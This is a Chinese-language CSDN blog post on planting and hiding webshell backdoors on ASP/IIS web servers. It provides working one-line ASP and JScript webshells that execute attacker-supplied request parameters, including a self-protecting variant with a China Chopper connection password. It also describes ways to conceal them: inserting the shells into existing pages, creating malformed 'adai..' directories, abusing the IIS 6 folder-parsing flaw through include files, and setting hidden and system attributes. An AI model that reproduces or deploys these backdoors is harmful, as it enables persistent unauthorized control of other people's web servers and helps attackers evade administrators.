webshell隐藏木马后门 - cracer_CSDN

 

attrib +a +h +s +r c:\wwwroot\back.php

把以下代码上传到webshell里,后缀是asp,就算别人发现了也删除不了,算是超级防删的一句话木马了,可以很安全的留个后门,菜刀连接密码:x
<%Eval(Request(chr(120))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if  f.attributes <> 39 then:f.attributes = 39:end if%>


webshell的隐藏—隐藏木马后门经验分享 
1.插马法


其实,我们可以直接把一句话插入已经存在的页面了,但是,问题出来了,像常用的

<%execute(request("a"))%>   <%execute(request("value"))%>   <%eval request("#")%>   <%if request("cnxhacker")<>"" then Session("b")=request("cnxhacker")  if Session("b")<>"" then execute Session("b")%>  等等,这些一句话一插进去的话,就会报错,一下就会被发现...其实,我们忽略了一个天天在用的S端

<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT> 冰狐的一句话客户端,这个调用的是Javascript脚本,跟调用Vbscript不同,Javascript是运行在客户端的,也就上一HTML端,所以我们可以直接把他插入在页面中,而不报错。这样,就达到了隐藏后门的技术。(建议大家找个比较大的页面,随便插在</td>,</tr>,</body>这些标签后门都可以的)

2.建立非标准目录

这个只要有CMDshell 就可以了,当然提权最好。直接在站点跟目录下建立个文件夹,DOS法:md adai.. 然后在拷贝自己的木马到这个目录下,比如木马在d:\web\wind.asp 就把他拷贝到d:\web\adai..\wind.asp 这样,也可以起到隐藏作用。

3.include调用法

知道最近出了个动易的ODAY么,就是利用03服务器的IIS解析的漏洞,我给大家讲解下,03服务器会对asp的文件进行解析,这样就可以达到我们隐藏后门的技术了,大家会经常看到

:<!--#include file=”.../conn.asp”--> 之类的代码吧,OK,咱们就利用这个方法来隐藏。

先建立个普通的asp文件夹(记着,是文件夹),例如adai.asp,然后再在adai.asp里面建立个图片文件如adai.jpg。在里面插入一句话代码。然后在建立个文本文件如wind.txt,接着在wind.txt里插入:<!--#include file=”.../adai.jpg”-->。这样咱们在访问站点的wind.txt时,就是我们的一句话后门了,有些菜鸟可能会问

<!--#include file=”.../adai.jpg”-->  是ASP的内容,怎么能在JPG里生效呢?我刚才不是说了么,03服务器的IIS会解析asp文件么。所以我们在访问adai.jpg时,他就误认为在访问wind.asp了。这种方法在隐藏方面也是很不错的,大家可以把adai.jpg放在别的目录里,记得更改下include file里的路径就可以了。
如果怕被管理员发现adai.asp时,咱们可以把他隐藏起来啊 DOS下输入:

attrib +H +S adai.asp 木马的防止一直是令人头疼的事,希望大家通过以上的介绍能够了解了后门木马的隐藏技术,已达到知己知彼百战百胜。
 
 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值